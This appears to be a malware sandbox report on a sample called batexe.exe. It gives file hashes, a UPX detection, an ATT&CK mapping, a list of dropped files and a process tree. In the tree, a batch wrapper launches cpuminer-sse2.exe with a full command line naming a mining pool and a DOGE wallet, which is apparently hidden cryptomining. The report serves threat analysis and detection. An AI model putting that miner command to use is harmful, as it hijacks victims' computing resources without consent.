73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
307s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 08:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4500	b2e.exe
3744	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1404-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1404 wrote to memory of 4500	1404	batexe.exe	74
PID 1404 wrote to memory of 4500	1404	batexe.exe	74
PID 1404 wrote to memory of 4500	1404	batexe.exe	74
PID 4500 wrote to memory of 3120	4500	b2e.exe	75
PID 4500 wrote to memory of 3120	4500	b2e.exe	75
PID 4500 wrote to memory of 3120	4500	b2e.exe	75
PID 3120 wrote to memory of 3744	3120	cmd.exe	78
PID 3120 wrote to memory of 3744	3120	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Users\Admin\AppData\Local\Temp\1846.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1846.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1846.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1E12.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1846.tmp\b2e.exe

Filesize
3.8MB

MD5
1b98075c8d7e8781de6407c5ff95de54

SHA1
3e7f1c9168b64c778d41e9a0ee4cca21b84f77e4

SHA256
cdcc1c065f81dec946113d76232d33b7718cea6ae6374590941c0ce22a704f18

SHA512
90b4594ddd137bce373715ad7524bb19296f427854c0bc935083cd6dbe843a11510ebbe43d98f18e98b84ae3d9bf873c0e308944ec4d5388026ea3ea5b103d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\1846.tmp\b2e.exe

Filesize
3.9MB

MD5
558356480775546c2e550c709d18387e

SHA1
9c9efdee4ed262b307ee822f7fedf9e2f2fd425f

SHA256
756961b1344a176beefa2937bed3c4851982a57ebef2a86465028a512dcddd60

SHA512
3cd7cf9ac8d423177cdecd299ea36b3d16338176bbf51666a7e54d701d370e3f7bd207bd017d809d59dd3e597bb73a9e09561e4f2ad6c15db3e118a411b1b5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E12.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
116KB

MD5
ba7ad45407350478b09ae17a4f0560b8

SHA1
c515dd725bdfb14e9cb0d989ad0c561745edc68d

SHA256
4f1857f1061dda80a8ffa4e9438979e27517c7ba4a617b13bfb21e80060d7ab3

SHA512
29c9c46b78e67cdce951d22a26b1e4478558343c96991870859bd8ae42c24a184925c8e1aa93e1387c80b65180cf419c44a3c98a4e04be92faebf595cd6b3d49

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
116KB

MD5
91eeaa0fef904a54c753c366b1780394

SHA1
89e676b663e1a0af438104ed84896ac83281a884

SHA256
90a0746573f174b21334201f7b978eff48c13a44ece85157060548a33bc7aa2c

SHA512
4d840968e83983a7b9eacb8786dcf81a7e77ae29e04b8855ffd6697a3b88cc1b3f0e8e3c6412a0a610c1b3d711ca77a10dab8833fb9f6ec1fe6b857dbe6124cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
38KB

MD5
a20099718b6e41a0f88411114caed6fe

SHA1
3b72b7bf93f7660996709ec62de33d0c22f84abc

SHA256
a0ffd2c9efc24e2b97de214f70405ed4258caaa4d82fb8c4be73dc3eb1bb4cb6

SHA512
85b8f0f139cd96c480b4533fdaf64c232a702ff6ab9c672e657f562b6b8af6d05397b7b38e580ab50530bd897064adb1939eec1e3b99f039ec9caac5d018a3ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
5KB

MD5
3e34b2489547da10b5b455d2943c960d

SHA1
68f3a57deea6970704e1e72f852981ad801a3e33

SHA256
4bbc1d62fd96678f14e91b11eb3ad9c5d2a68e588e8165aba86e316b8ff23199

SHA512
4e511855588b69b6d1b0f287dfc479a3a4b4957b80a875b4bc4414ff332cd5b7daa0deb4e1b8e9e7b1ff17146008c467a3ef817a3e63a22c806c067503a7df6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
560KB

MD5
b836a219a57417ad9818d9476d5aea82

SHA1
3c642f5e4ac5f51151e2ba6881b815599ab7c161

SHA256
9cedf688ee1790b7e1abfb9428380dfe83056eb47e8596ac7922e1acb3931851

SHA512
9dc47dd54655a524c33d70633f8327a7ea609e03be58ead4c08202960b131f594b4fc143a3913fd5c14d73e5b157093337b7124471cefc9bf399285951d617e1

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
42KB

MD5
ca5b4b44ec50ad0590f81973a9627afe

SHA1
a8d595f264ce9b2e6287c38aff5b0e93be0c10b3

SHA256
003f4ace9d4fbdbcb03f795a183e03449f53d578e029920fad66f45d76ec0333

SHA512
07576a95ffeb7b9ea3c21bff7423ee84cab516e2a319e229075fc7fc5e7320a9e21500dfb50c51170227e4ac9abc1f6360e0cffd98c894daeac3e3dcdb94be1b

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
518KB

MD5
43c23a8dc1e3dac131d48720b5b6d2dd

SHA1
a38f9e264a1722e14cd946d2b3061752d0970a61

SHA256
c2e03052f83061d0b02a75040297f8dac50724edee4537e92da122f61319f0d7

SHA512
b2fa670d044c2d485b32c6b39a948236ac0c5c9e77c2dae37a235a9395315436650a9a23fb5f880072b23efdd5b43a75217d716b81a408e88bfef5b17cbd8478

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
402KB

MD5
7fa2c66dd9bc3b20d0f8134e348d7516

SHA1
49d8e89ee26b6784662a5fb60d1a55ca1b216d6c

SHA256
818dc8d3eaf529d86a1ac006af0ebe78160ec2ae76b2bbe8128d835f22269cbc

SHA512
a1ae1b9931d1f02936dd8b17d69d38498bfd93a2416da4e12b9dc47979facb3f0fcea10922a5ca69b6993c0fc77a61d39219235e0e0309d7b261a6773d3a7545

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
620KB

MD5
d22ae3e33a252075f974dfc92c852c9d

SHA1
640ee03122100d5cdb4cbaaa1153cb681aaa7f11

SHA256
c56c9e2a8939b5265c193084a0e46feae6a414e0f5f69c4f5842e615356b9ad9

SHA512
79f53cc42673232124624e2b4265b7011378a264305dec6895918699ae4590f045907daa99c2c399fb6abb4c8fcffb5f44a61a54211bdd80277bb332d8eb8b48

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
483KB

MD5
6bb59634216fb4b4f881e5f09cf05db0

SHA1
57b07aa2b00a1019d42f2111e5ab5bc267480b67

SHA256
71404e57c774efa3e75a32d29897745ae22d0849e615afb01e9ba043e51b1ad5

SHA512
e5e5270ce17047703c00b01f874eea2afd775f7958a948157294c66d0b40eef52ed7f9e26cc89501fa9138c33b12e735ad28f6e636d8b09997b7fa8d79a31837

Download Submit
memory/1404-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3744-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3744-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3744-43-0x0000000061B90000-0x0000000061C28000-memory.dmp

Filesize
608KB

Download
memory/3744-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3744-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4500-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4500-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download